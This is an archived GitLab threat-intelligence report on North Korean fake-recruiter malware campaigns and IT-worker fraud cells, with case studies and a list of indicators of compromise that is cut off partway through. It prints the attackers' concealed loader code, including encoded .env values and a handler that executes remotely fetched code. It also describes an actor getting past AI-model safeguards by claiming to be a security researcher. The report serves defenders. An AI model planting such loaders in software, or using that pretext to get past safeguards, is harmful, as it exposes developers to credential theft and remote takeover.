{
	"id": "8d3e7cec-e00b-4f44-85b0-dbb3301d4d7b",
	"created_at": "2026-04-06T00:22:15.23772Z",
	"updated_at": "2026-04-10T13:12:11.884671Z",
	"deleted_at": null,
	"sha1_hash": "6190986342b844c6e7130019191deac5190dee64",
	"title": "GitLab Threat Intelligence Team reveals North Korean tradecraft",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4014273,
	"plain_text": "GitLab Threat Intelligence Team reveals North Korean tradecraft\r\nBy Oliver Smith\r\nPublished: 2026-02-19 · Archived: 2026-04-05 23:46:37 UTC\r\nWe’re sharing intelligence on threat actors associated with North Korean Contagious Interview and IT worker campaigns to\r\nraise awareness of emerging trends in operations and tradecraft. We hope this analysis helps the broader security community\r\ndefend against evolving threats and address the industry-wide challenge of threat actors using legitimate platforms and tools\r\nfor their operations. Publishing this intelligence reflects our commitment to disrupting threat actor infrastructure. Our\r\nsecurity team continuously monitors for accounts that violate our platform’s terms of use and maintains controls designed to\r\nprevent the creation of accounts from U.S.-embargoed countries in accordance with applicable trade control laws.\r\nThere is no action needed by GitLab customers and GitLab remains secure.\r\nExecutive summary\r\nWhat is Contagious Interview?\r\nSince at least 2022, North Korean nation-state threat actors have posed as recruiters to induce software developers to\r\nexecute malicious code projects under the pretense of technical interviews. Malicious projects execute custom malware,\r\nallowing threat actors to steal credentials and remotely control devices, enabling financial and identity theft and lateral\r\nmovement. This malware distribution campaign has impacted thousands of developers and is tracked in industry research as\r\nContagious Interview.\r\nAbout the report\r\nIn 2025, GitLab identified and banned accounts created by North Korean threat actors used for Contagious Interview.\r\nGitLab’s visibility into these actors' code repositories provides unique, real-time intelligence into the infrastructure powering\r\ncampaign activity. 
In some instances, we can leverage this insight to identify private GitLab.com projects created and used\r\nby North Korean nation-state threat actors. Some private projects contain malware development artifacts powering North\r\nKorean nation-state malware campaigns. Other projects contain records and notes or software capabilities that support North\r\nKorean sanctions evasion and revenue generation through IT worker activity.\r\nExposing this activity discourages future attempts by these actors to create GitLab accounts and offers insights other\r\norganizations can use to enhance their own defenses.\r\nThis report contains a Year in Review summarizing activity from North Korean nation-state actors that used GitLab.com for\r\ntheir operations in 2025, including a campaign-level view into malware infrastructure and technique trends. The report also\r\nincludes case studies analyzing:\r\nFinancial records maintained by the manager of a North Korean IT worker cell, detailing proceeds from 2022 to 2025\r\nA synthetic identity creation pipeline used to create at least 135 personas, automated to generate professional\r\nconnections and contact leads at scale\r\nA North Korean IT worker controlling 21 unique personas and adding their own image to stolen U.S. identity\r\ndocuments\r\nA North Korean IT worker recruiting facilitators and working for U.S. organizations while operating from Moscow,\r\nRussia\r\nWe’re also sharing more than 600 indicators of compromise associated with these case studies, which can be found in the\r\nAppendix.\r\nYear in Review\r\nNorth Korean nation-state malware activity accelerated in the second half of 2025 and peaked in September. We banned an\r\naverage of 11 accounts per month for distributing North Korean nation-state malware or loaders. 
We assess that North\r\nKorean nation-state malware activity on GitLab.com almost certainly relates to distinct teams operating in parallel based on\r\nbranching distribution and obfuscation techniques, infrastructure, and malware variants.\r\nKey findings\r\nHere are our key findings, including 2025 campaign trends and malicious code project features.\r\n2025 campaign trends\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 1 of 48\n\nIn 2025, we banned 131 unique accounts distributing malicious code projects we attribute to North Korean nation-state\r\nthreat actors. We identified malicious projects through a combination of proactive detection and user reports. In every\r\ninstance, threat actors used primarily JavaScript codebases. Malicious repositories executed JavaScript-based malware\r\nfamilies tracked publicly as BeaverTail and Ottercookie in more than 95% of cases, however we also observed the\r\ndistribution of lower prevalence payloads, including the compiled ClickFix BeaverTail variant we identified in September.\r\nThreat actors typically originated from consumer VPNs when interacting with GitLab.com to distribute malware; however\r\nthey also intermittently originated from dedicated VPS infrastructure and likely laptop farm IP addresses. Threat actors\r\ncreated accounts using Gmail email addresses in almost 90% of cases. We observed custom email domains in only five\r\ncases, all relating to organizations we assess are likely front companies controlled by North Korean threat actors. Based on\r\nproject composition, threat actors most commonly targeted developers seeking employment in the cryptocurrency, finance,\r\nand real estate sectors. 
Threat actors also targeted developers in sectors, including artificial intelligence and gaming, at a low\r\nrate.\r\nIn more than 80% of instances, threat actors did not store malware payloads on GitLab.com, instead storing a concealed\r\nloader intended to source and execute remote content. Threat actors abused at least six legitimate services to host malware\r\npayloads, most commonly Vercel. Threat actors also used custom domains to host malware payloads at least 10 times in\r\n2025.\r\nDistribution of staging infrastructure used in North Korean nation-state malware activity on GitLab.com in 2025.\r\nWe observed diverse project structures and a gradual evolution of concealment techniques through 2025. In nine instances,\r\nthreat actors used malicious NPM dependencies created immediately prior to their use in malicious projects. In December,\r\nwe observed a cluster of projects executing malware via VS Code tasks, either piping remote content to a native shell or\r\nexecuting a custom script to decode malware from binary data in a fake font file.\r\nDistribution of features in North Korean nation-state malware projects activity on GitLab.com in 2025.\r\nMalicious code project features\r\nThe most common execution pattern we observed in 2025 had the following features:\r\nA base64 encoded next-stage URL, header key, and header value, all masquerading as benign variables in a .env file.\r\nA trigger function intended to source remote content and raise an error.\r\nA global invocation of the trigger function in a file executed as soon as the project is run.\r\nA custom error handler intended to execute remote content from the trigger function by using\r\nFunction.constructor to load a string as executable code.\r\nExample excerpt from a .env file containing malicious encoded variables:\r\n # Runtime 
Configuration\r\nRUNTIME_CONFIG_API_KEY=aHR0cHM6Ly9hcGktc2VydmVyLW1vY2hhLnZlcmNlbC5hcHAvYXBpL2lwY2hlY2stZW5jcnlwdGVkLzgyMw\r\nRUNTIME_CONFIG_ACCESS_KEY=eC1zZWNyZXQtaGVhZGVy\r\nRUNTIME_CONFIG_ACCESS_VALUE=c2VjcmV0\r\n \r\nDecoded values from the .env file (defanged):\r\n # Runtime Configuration\r\nRUNTIME_CONFIG_API_KEY=hxxps[:]//api-server-mocha.vercel[.]app/api/ipcheck-encrypted/823\r\nRUNTIME_CONFIG_ACCESS_KEY=x-secret-header\r\nRUNTIME_CONFIG_ACCESS_VALUE=secret\r\n \r\nExample trigger function intended to source remote content from the concealed staging URL and trigger the custom\r\nerror handler:\r\n const errorTimeHandler = async () =\u003e {\r\n try {\r\n const src = atob(process.env.RUNTIME_CONFIG_API_KEY);\r\n const k = atob(process.env.RUNTIME_CONFIG_ACCESS_KEY);\r\n const v = atob(process.env.RUNTIME_CONFIG_ACCESS_VALUE);\r\n try {\r\n globalConfig = (await axios.get(`${src}`, {\r\n headers: {\r\n [k]: v\r\n }\r\n }));\r\n log('Runtime config loaded successfully.');\r\n } catch (error) {\r\n errorHandler(error.response?.data || error.message);\r\n }\r\n } catch (err) {\r\n await errorHandler(err.response?.data || err.message || err);\r\n }\r\n};\r\n \r\nExample custom error handler intended to execute remote code:\r\n const errorHandler = (error) =\u003e {\r\n try {\r\n if (typeof error !== 'string') {\r\n sss\r\n console.error('Invalid error format. 
Expected a string.');\r\n return;\r\n }\r\n const createHandler = (errCode) =\u003e {\r\n try {\r\n const handler = new(Function.constructor)('require', errCode);\r\n return handler;\r\n } catch (e) {\r\n console.error('Failed:', e.message);\r\n return null;\r\n }\r\n };\r\n const handlerFunc = createHandler(error);\r\n if (handlerFunc) {\r\n handlerFunc(require);\r\n } else {\r\n console.error('Handler function is not available.');\r\n }\r\n} catch (globalError) {\r\n console.error('Unexpected error inside errorHandler:', globalError.message);\r\n }\r\n};\r\n \r\nThe error handler execution pattern allows threat actors to spread malicious components across up to four files and follows a\r\ncode path targets may miss even if they audit code before running it. Staging URLs commonly respond with decoy content\r\nunless the correct header values are included with requests. This technique became increasingly common through 2025,\r\nalongside other anti-analysis developments, including sandbox detection in Ottercookie and the increasing use of invite-only\r\nprivate projects.\r\nThe extent to which distinctive subgroups of activity overlap in time leads us to assess that North Korean nation-state\r\nmalware distribution on GitLab.com almost certainly relates to distinct teams operating in parallel with limited coordination.\r\nWe’ve observed instances consistent with individual operators independently trying to fix an execution issue or add a feature\r\nto their malware. We also observed instances where threat actors have more than one malware execution pathway in a\r\nmalicious repository, potentially resulting in malware executing twice or more. 
These instances suggest low technical\r\nproficiency among some operators, who appear to lack confidence when modifying malware code.\r\nOther notable observations\r\nIn July 2025, we identified a project containing notes kept by a North Korean nation-state malware distributor. The threat\r\nactor maintained a target list containing more than 1,000 individuals' names. Comments added by the threat actor identify\r\n209 individuals having responded to contact attempts, 88 of whom were recorded as having executed a malicious project.\r\nThis operator also maintained documents and code related to contract software development, suggesting simultaneous\r\nengagement in both malware distribution and fraudulent employment.\r\nIn September 2025, we observed a North Korean nation-state malware developer using AI to help develop a custom\r\nobfuscator for BeaverTail. Based on commit messages and project data, the developer used ChatGPT and Cursor (with an\r\nunknown model) to refine their obfuscator by testing whether AI was capable of de-obfuscating their code. Based on AI\r\nmodel responses, the threat actor was able to avoid triggering safeguards by posing as a security researcher attempting to\r\nanalyze the malware. This demonstrates the broadly empowering nature of AI and the limits of safeguards in preventing use\r\nby motivated threat actors. We have not observed the BeaverTail variant the threat actor created in the wild.\r\nIn October 2025, a North Korean nation-state-controlled account submitted a support ticket to appeal a ban from\r\nGitLab.com for malware distribution. The threat actor, posing as the CTO of a newly created cryptocurrency organization,\r\ninquired about the reason for their ban and requested account reinstatement. We assess that this support ticket was likely an\r\nattempt to gather information about our detection methodology. 
We provided no information to the threat actor and also\r\nbanned a subsequent account they created using the same CTO persona.\r\nImplications\r\nNorth Korean nation-state malware operations are atypical because of how much direct human effort is involved. The\r\nvolume of manual effort by many operators presents a challenge to service providers because of the extreme diversity in\r\ntechniques that emerges.\r\nWe observed an increasing emphasis on obfuscation and evasiveness in the second half of 2025, indicating that service\r\nprovider disruptions are forcing an evolution in tactics. Despite this, we anticipate that North Korean nation-state malware\r\ncampaigns will continue through 2026 due to the continued effectiveness of the campaign and the high value of developer\r\nendpoints to North Korean threat actors.\r\nMitigation\r\nWe banned 131 accounts associated with North Korean nation-state malware distribution in 2025. We’re grateful for the\r\nabuse reports we received from GitLab.com users, which helped us to track threat actors through infrastructure and\r\ntechnique shifts. We encourage GitLab.com users encountering malicious or suspicious content to continue to submit abuse\r\nreports using the abuse report functionality on user profile pages.\r\nWe improved our data collection and clustering of North Korean nation-state accounts and invested in new capabilities to\r\nidentify threat actor infrastructure. We collaborated with industry partners to share our data, enabling the disruption of\r\naccounts on other platforms.\r\nCase studies\r\nCase Study 1: North Korean IT Worker Cell Manager Financial and Administrative Records\r\nSummary\r\nWe identified a private project almost certainly controlled by Kil-Nam Kang (강길남), a North Korean national managing a\r\nNorth Korean IT worker cell. 
Kang maintained detailed financial and personnel records showing earnings of more than\r\nUS$1.64 million between Q1 2022 and Q3 2025. Kang’s cell currently includes seven other North Korean nationals and\r\ngenerates revenue through freelance software development under false identities. We assess that the cell is highly likely\r\ncolocated and operating from Beijing, China.\r\nKey findings\r\nIn late 2025, we identified a private project containing financial records and administrative documents related to the\r\noperation of a North Korean IT worker cell. Detailed financial records span from Q1 2022 to Q3 2025, however less detailed\r\nrecords indicate the cell was operating as early as 2019.\r\nWe assess that the project is almost certainly controlled by North Korean national Kil-Nam Kang. Records indicate that\r\nKang managed the cell as two subteams in 2022, however from 2023 onwards only tracked performance at the individual\r\nlevel. Kang maintains detailed personnel records, including dossiers on each team member, performance reviews, and copies\r\nof team members’ passports. Kang also has credentials to remotely access each cell member's workstation.\r\nAssessed organization chart of the North Korean IT worker cell managed by Kil-Nam Kang.\r\nPersonnel dossiers list each of the cell members as “베이징주재 김일성종합대학 공동연구중심 연구사”, translating to\r\n“Researcher at Kim Il-sung University Joint Research Center in Beijing”. This designation suggests that the cell’s presence\r\nin China may be under an academic pretext. Kang generally accessed GitLab.com via Astrill VPN, however we also\r\nobserved origination from China Unicom IP addresses geolocated to Beijing, most recently 111.197.183.74 .\r\nDossiers list devices and accounts owned by each cell member, including passwords to access accounts. Dossiers list from\r\ntwo to four “대방관계” (“bilateral relations”) for each cell member. 
We assess that these bilateral relations almost certainly\r\ninclude active facilitators, however may also include inadvertent facilitators or victims of identity theft. Bilateral relations\r\nspan countries including the U.S., Canada, Mexico, Panama, the U.K., France, Spain, Sweden, Montenegro, Russia, China,\r\nThailand, Indonesia, Malaysia, Philippines, Sri Lanka, Argentina, Chile, and Peru. The project contains other data on\r\nbilateral relations, including identity documents, banking information, and credentials to remotely access devices and\r\naccounts.\r\nFinancial records indicate that the cell generates revenue through freelance and contract software development services. The\r\ncell maintains detailed notes linking each software development project to a facilitator persona. These notes include samples\r\nof communication styles and notes on facilitator circumstances and temperaments to enable cell members to switch between\r\nprojects if required. The cell focused on web and mobile app development.\r\nSoftware development clients pay the cell via digital payment processors. Withdrawal receipts indicate that cell members\r\nwithdraw funds from payment platforms into Chinese banks. The cell maintained organized banking records, including\r\ndigital images of Chinese Resident Identity Cards, which are required to access the Chinese financial system. The cell\r\nmaintained individual records for at least three Chinese banks. 
One Chinese Resident Identity Card relates to a North\r\nKorean national who is not a member of the cell.\r\nScreenshot of project spreadsheet showing deposits and withdrawal from virtual bank accounts, dated November 2025.\r\nClient \u0026 financial organization names redacted.\r\nScreenshot of spreadsheet tracking withdrawals from digital payment processors to Chinese bank accounts.\r\nThe project contained more than 120 spreadsheets, presentations, and documents that systematically track quarterly income\r\nperformance for individual team members. Reports compare team member earnings against predefined targets and quarter-over-quarter performance. The comprehensiveness and highly structured nature of financial reports is indicative of regular\r\nfinancial monitoring and reporting to leadership.\r\nScreenshot of presentation showing cell performance data for Q3 2025.\r\nScreenshot of presentation showing cell member performance relative to goals for Q3 2025.\r\nScreenshot of presentation showing cell performance data by month for Q3 2025.\r\nWe aggregated financial data and identified a total reported income of US$1.64 million from Q1 2022 to Q3 2025. The cell\r\nhad a target of US$1.88 million over the same period. The cell averaged approximately US$117,000 per quarter,\r\napproximately US$14,000 per member excluding Kang. The cell produced the highest earnings in the first half of 2022 and\r\nlowest earnings in Q3 2025.\r\nActual and target cell earnings over time, 2022 to 2025.\r\nWe assess that cell income goals were likely set based on a combination of prior earnings and cell membership. 
In Q3 2025,\r\ncell member Won-Jin Kim was dropped from tracking and his documentation was shifted to a directory marked “귀국”\r\n(“Return to the home country”). We assess that Won-Jin Kim’s departure from the cell is unlikely to relate to revenue\r\ngeneration performance based on consistently high earnings relative to other members.\r\nThe private project also contained performance reviews for cell members, dated 2020. These performance reviews confirm\r\nthat the cell is physically colocated and include commentary about cell members’:\r\nEarnings contribution and mutual skills development.\r\nVoluntary donations for Typhoon Bavi and COVID-19 recovery in North Korea.\r\nContributions to collective household duties, including doing laundry, providing haircuts, and purchasing shared food\r\nand drink.\r\nInterpersonal values and adherence to party values.\r\nThese reviews suggest that the cell operates as a tightly controlled collective household where individual performance\r\nencompasses both revenue generation and ideological conformity. We observed instances of a cell member communicating\r\nwith an unknown party by continually overwriting an HTML comment hidden in a large decoy codebase. The other party\r\nappeared to be able to communicate with North Korea, and provided the cell member with information about personal\r\nmatters and the international movements of mutual contacts. This communication method was unique to this exchange and\r\nmay have been an attempt by the cell member to evade surveillance by their superiors.\r\nCommit showing a cell member communicating with an unknown party to pass on messages from inside North Korea.\r\nImplications\r\nThis activity provides a unique view into the financial operations and organizational structure of a North Korean IT worker\r\ncell. Records demonstrate that these operations function as structured enterprises with defined targets and operating\r\nprocedures and close hierarchical oversight. 
This cell’s demonstrated ability to cultivate facilitators globally provides a high\r\ndegree of operational resiliency and money laundering flexibility.\r\nThe declining earnings trend through 2025 may reflect a changing landscape due to increased public awareness of North\r\nKorean IT worker activities. Despite this decline, the cell had earnings exceeding US$11,000 per member in Q3 2025,\r\ndemonstrating a clear capability to generate funds for the regime.\r\nMitigations\r\nWe banned accounts related to this activity.\r\nCase Study 2: Synthetic Identity Creation and Service Abuse at Scale\r\nSummary\r\nWe identified a North Korean nation-state software development team collaborating on a large-scale synthetic identity\r\ncreation capability. The capability included functionality to scrape images and personal data, generate fake passports, and\r\nautomate email and professional networking accounts to generate leads. The threat actors also developed tools to\r\nsynchronize Git repositories and created copies of proprietary code they gained access to. This activity cluster created a\r\nminimum of 135 synthetic identities purporting to originate from Eastern Europe and Southeast Asia. Using these personas,\r\nthe actor gained access to at least 48 private codebases.\r\nKey findings\r\nWe identified a set of projects contributed to by a North Korean nation-state activity cluster focused on capability\r\ndevelopment and large scale synthetic identity creation. The cluster included 10 distinct GitLab accounts or Git identities\r\nthat exhibited concurrent activity or had distinct origins, leading us to assess that the activity cluster highly likely comprised\r\nat least a small team of developers. Accounts commonly originated from Virtual Private Servers but intermittently originated\r\nfrom Russian IP space. 
The development team commenced activities in 2021 but was most active from late-2024 to mid-2025.\r\nThe threat actor developed a complex multistage process to generate synthetic identities at scale. The overall flow of the\r\nthreat actor’s identity creation capability was to:\r\n1. Scrape photographs from social media, AI image generators, and other platforms.\r\n2. Use the legitimate faceswapper.ai service to create novel images by swapping faces from diverse source images into\r\nheadshot-style images suitable for identity documents.\r\n3. Generate passports with fake personal information using VerifTools and newly created headshots. VerifTools is an\r\nillicit fraudulent identity document service disrupted by U.S. authorities in August 2025. Downloaded passports\r\ncontained watermarks because the threat actor did not pay for VerifTools.\r\n4. Use an automated Adobe Photoshop routine stored in a .atn file to extract and remove VerifTools watermarks.\r\n5. Create accounts on email and professional networking sites. The threat actor used fake passports to seek enhanced\r\nidentity verification on professional networking sites.\r\nThe threat actor’s tooling to interact with abused services was brokered through a control node hosted at 185.92.220.208 .\r\nThis control node served a custom API that allowed individual operators to remotely create, monitor, and control individual\r\naccounts. The threat actor used web browsers instrumented with Selenium to interact with abused services. 
The threat actor\r\nprimarily automated accounts to make connections and cold contact leads to generate software engineering work.\r\nThe threat actor used a combination of dedicated, IPRoyal, and open proxies to obfuscate their activities and stored a\r\nmassive volume of solutions to animal/object matching CAPTCHA challenges to facilitate bypasses in automated scripts.\r\nThe control node tracked the efficacy of the threat actor’s accounts, contact scripts, and infrastructure, allowing the threat\r\nactor to monitor campaign effectiveness and adapt its techniques over time through an administrative dashboard.\r\nThe threat actor stored working data on dedicated infrastructure or in cloud storage accounts rather than on GitLab.com.\r\nHowever, in September 2024, the threat actor inadvertently committed a dump of its database to GitLab.com. The database\r\ncontained records of profiles controlled at that time, which was early in the development of the capability. The contents of\r\nsome fields in the database were encrypted, however the server-side decryption routine code stored on GitLab.com\r\ncontained a hard-coded key, allowing us to decrypt the data.\r\nAs of September 2024, the threat actor controlled 135 synthetic identities. Identities most commonly purported to be based\r\nin Serbia, but also purportedly originated from Poland, Philippines, Indonesia, Bulgaria, Croatia, Romania, Lithuania,\r\nMoldova, Hungary, and Slovakia. For each account, the threat actor stored information about whether identity verification\r\nwas successful, with overall results indicating the threat actor was successful in just over 40% of verification attempts.\r\nCommit volume on the synthetic identity capability escalated sharply from September 2024 to December 2024, indicating\r\nthat the true scale of the threat actor’s activities may have been much higher. 
The threat actor also had more than 73,000\r\nleads stored in its database dump, providing insight into the scope of its outbound activities.\r\nThe threat actor also created a set of command line tools for standardized Git operations. The tooling was primarily intended\r\nto allow the threat actor to mirror Git repositories from private namespaces on a range of cloud and self-managed source\r\ncode management systems. The tooling allowed the threat actor to push commits to the mirror and then have them\r\nsynchronized to remote repositories under the correct Git identities. This capability gave the threat actor a safety net against\r\nmaking commits under the wrong identity and also meant that they exfiltrated copies of codebases they gained access to.\r\nBased on metadata reports committed to GitLab.com by the threat actor, they used this mirroring tooling on at least 48\r\nunique repositories.\r\nImplications\r\nThis cluster is notable among North Korean nation-state activity we observed in 2025 due to the strong focus on automation\r\nand continued efficacy monitoring. This cluster also demonstrates that North Korean nation-state threat actors draw on both\r\nemerging AI capabilities and the cybercrime ecosystem to enhance their operations.\r\nIdentity development is a fundamental element of North Korean nation-state insider activity. North Korean nation-state\r\nthreat actors incrementally build legitimacy through identities spanning multiple platforms and by seeking enhanced\r\nverification services where possible. North Korean nation-state identity cultivation draws on network effects by creating\r\ninteractions, reviews and testimonials between personas. These tactics have the drawback of increasing threat actors’\r\nexposure to service provider takedowns. 
Organizations should treat applications with dead links to professional profiles and\r\nsource code portfolios as highly suspicious.\r\nMitigations\r\nWe banned the accounts associated with this activity and notified impacted service providers of potential abuse of their\r\nplatforms.\r\nCase Study 3: North Korean Operator Controlling 21 Personas\r\nSummary\r\nWe identified an individual North Korean operator controlling at least 21 distinct personas based on real identities. The\r\nthreat actor was focused on revenue generation through contract and freelance software development. The threat actor’s\r\npersonas spanned five countries and were supported by doctored identity documents and personal information obtained from\r\nopen sources and through a likely cyber intrusion.\r\nKey findings\r\nWe identified a code project used by an individual North Korean operator active from at least May 2021 until February\r\n2025. The threat actor was focused on generating revenue through contract and freelance software development under a\r\nrange of stolen or shared identities, spanning at least 21 distinct personas. The threat actor focused on web, blockchain, and\r\ncloud skill sets, and created blogs and professional social media accounts on various external platforms. The threat actor\r\ntypically accessed GitLab.com via commercial VPNs and Virtual Private Servers with RDP enabled. Based on lapses in\r\nproxy use, the threat actor was likely physically located in Russia during early 2025.\r\nThe threat actor maintained individual directories for each identity, containing identity documents, resumes, signatures,\r\npersonal information, and payment card information. The threat actor’s identities spanned the U.S., Canada, Ukraine,\r\nEstonia, and Macedonia. 
For five of their eight U.S.-based identities, the threat actor used Photoshop to edit their own image\r\ninto one or more stolen identity documents, preserving otherwise valid details. The threat actor produced false Florida and\r\nTexas driver licenses and false U.S. passports. The threat actor had Photoshop Document (PSD) template files to produce\r\nidentity documents for Australia, Austria, Canada, Finland, Germany, Malaysia, Mexico, Philippines, and Poland. We\r\nidentified some of these template files for sale via illicit services online and assess that the threat actor likely purchased the\r\ntemplates.\r\nDoctored U.S. identity documents containing the threat actor’s photograph.\r\nThe threat actor also collected personal information on U.S.-based individuals. The threat actor had files that appear to have\r\nbeen exported from the HR management system of a large U.S.-based hospitality company. The files contained information\r\nincluding personal and contact details, protected class status, and identity document numbers for almost 8,000 employees of\r\nthe organization. We were unable to locate this data in circulation or data breach aggregators, suggesting that the data may\r\nhave been obtained by the threat actor during an intrusion or purchased in a one-off sale. The threat actor also had an export\r\nof the public Florida voter registration database, which is one of the most detailed publicly available voter databases.\r\nImplications\r\nThis threat actor’s activities suggest that North Korean threat actors place a particular value on U.S. identities. We identified\r\nno evidence that the threat actor altered non-U.S. identity documents or collected personal data from any other country. 
This\r\nactivity also demonstrates that North Korean threat actors, even when focused on earning wages, present a cyber intrusion\r\nrisk and actively leverage the cybercrime ecosystem to support their operations.\r\nMitigation\r\nWe banned the account associated with this operator.\r\nCase Study 4: North Korean Fake IT Worker Operating from Central Moscow\r\nSummary\r\nWe identified a private code repository used by a North Korean fake IT worker likely operating from central Moscow. The\r\nthreat actor was focused on cultivation of a smaller group of more detailed personas and progressed from freelance work to\r\nfull-time employment. The threat actor also attempted to recruit remote facilitators to maintain custody of laptops intended\r\nto be remotely accessed.\r\nKey findings\r\nWe identified a private code project controlled by a North Korean fake IT worker most recently active in December 2025.\r\nWe identified the project within a week of its creation, however the threat actor's records indicate they have been active on\r\nother platforms since at least 2022. The threat actor started as a freelance software developer and 3D modeler but shifted\r\nfocus to seeking fraudulent full-time employment in 2025. The threat actor’s strategy relied on a smaller number of personas\r\nwith emphasis on establishing legitimacy through backstopping rather than relying on many disposable personas.\r\nRepository contents indicate that the threat actor began as a fraudulent freelancer. Invoices created by the threat actor during\r\nthis period were marked payable to individuals and addresses in China, Poland, and Spain. Documents stored by the threat\r\nactor indicate that they rotated through accounts on at least three payment processors to receive payments from clients. 
A\r\nspreadsheet stored by the threat actor indicates they were part of a 14-member cell in 2022, however they did not store\r\ncontinuous financial records on GitLab.com. North Korean cells we have observed on GitLab.com typically have smaller\r\nmembership and this is the only data we have observed consistent with a cell membership exceeding 10.\r\nIn early 2025, the threat actor pivoted to attempting to obtain full-time employment at U.S. and U.K. organizations. In\r\nMarch 2025, the threat actor uploaded chat logs to GitLab.com containing exchanges with another likely North Korean\r\noperator. The threat actors discussed their progress in recruiting individuals in the U.S. and U.K. to maintain custody of\r\nlaptops to be remotely accessed in exchange for a fixed fee and the payment of power and internet utilities. The primary\r\nthreat actor mentioned having a current facilitator based in Hong Kong providing remote access to a device and sharing their\r\nidentity and a potential facilitator in the U.K. The primary threat actor represented himself as a Chinese national with visa\r\ndifficulties when attempting to recruit facilitators.\r\nIn April 2025, the threat actor operationalized the Hong Kong-based facilitator and started seeking employment. The threat\r\nactor circulated a set of resumes with different skill sets on resume-sharing sites and on a personal portfolio website. The\r\nthreat actor took a series of photographs of themselves and used several AI-headshot services to create professional profile\r\nphotos.\r\nOriginal and AI-enhanced images of the threat actor stored in private projects and open-source examples claiming\r\nemployment at two U.S.-based organizations.\r\nThe threat actor uploaded the original images used to create their AI headshots to GitLab.com. The images contained EXIF\r\nmetadata, including GPS coordinate data. 
GPS coordinates stored on the images indicate that they were taken at\r\n55°43'44.4\"N 37°36'55.8\"E , which is a location in the Yakimanka District in central Moscow. We note that these\r\ncoordinates were highly likely produced via Windows location services based on WiFi positioning and may have a reduced\r\naccuracy compared to true GPS. Despite this limitation, we assess that it is highly likely that this threat actor was based in\r\nMoscow when the images were captured on April 18, 2025. The threat actor also commonly originated from Russian IP\r\naddresses when accessing GitLab.com without a VPN.\r\nMap depicting the location stored in EXIF metadata on images of the threat actor.\r\nThe threat actor’s notes indicate that they gained employment with at least one small U.S.-based technology agency in mid-2025 and were subsequently contracted to five other organizations. The threat actor appears to have gained significant access\r\nto the agency, including privileged access to web hosts used for client projects and potential access to an executive’s Slack\r\naccount. The threat actor stored copies of the executive’s resume and message logs indicating that the threat actor may\r\nrepresent themselves as the executive in communications with external parties. We are unable to assess whether this is an\r\ninstance of facilitation or the threat actor using their foothold to establish deeper control of the agency.\r\nImplications\r\nThis incident is an example of a North Korean fake IT worker cultivating a small number of detailed personas. This\r\napproach is distinct from other operators that focus on a higher volume of disposable personas.\r\nThis incident also provides insight into North Korean facilitator cultivation. 
The threat actors were content to seek purely\r\ntechnical facilitators rather than facilitators willing to share their identities and participate in meetings. This preference\r\nsuggests that North Korean operators prioritize circumventing technical controls such as IP address-based geolocation and\r\nreputation scoring over identity verification challenges, indicating that technical controls may be a more significant\r\noperational barrier in the current landscape.\r\nMitigations\r\nWe banned the account associated with this activity.\r\nSaksham Anand contributed to this report.\r\nAppendix 1: GitLab Threat Intelligence Estimative Language\r\nWe use specific language to convey the estimated probability attached to assessments. We also use words including\r\n\"possible\" and \"may\" in circumstances where we are unable to provide a specific estimate. Further reading on estimative\r\nlanguage is available here.\r\nEstimative Term | Probability Range\r\nAlmost Certainly Not | 0 - 10%\r\nHighly Unlikely | 10 - 25%\r\nUnlikely | 25 - 40%\r\nReal Chance | 40 - 60%\r\nLikely | 60 - 75%\r\nHighly Likely | 75 - 90%\r\nAlmost Certain | 90 - 100%\r\nAppendix 2: Indicators of Compromise\r\nWe recommend that organizations use these indicators of compromise as a basis for investigation rather than as a blocklist.\r\nNorth Korean threat actors almost certainly use compromised and purchased identities to support their operations, meaning\r\nthese indicators of compromise may not be uniquely malicious or may have reverted to their original owners. 
We have made\r\nour best efforts to filter for email addresses where threat actors have indicated positive control of the email address on one or\r\nmore platforms or represented themselves as the associated identity.\r\n
e\r\nerasmusmadridtrops@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nericdoublin1111@yahoo.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\neruqulpuaro@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\neruqulpuaro@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\neruqulpuaro1@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\neruqulpuaro1@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nfangshan2019@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\ngoldstar0906@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\ngtracks.onelink@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nhappycoder1111@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nhappyleonardo77@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nhittapa9@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nhousinginmadrid@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nimadjeghalef@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nimranwork44@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nindulgenight@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\njaneisman@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 28 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\njaneisman21@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\njingya0131@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\njinkonachi@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\njoizelmorojo@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\njorgencnc0608@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\njorgencnc0608@outlook.com email insider N/A 
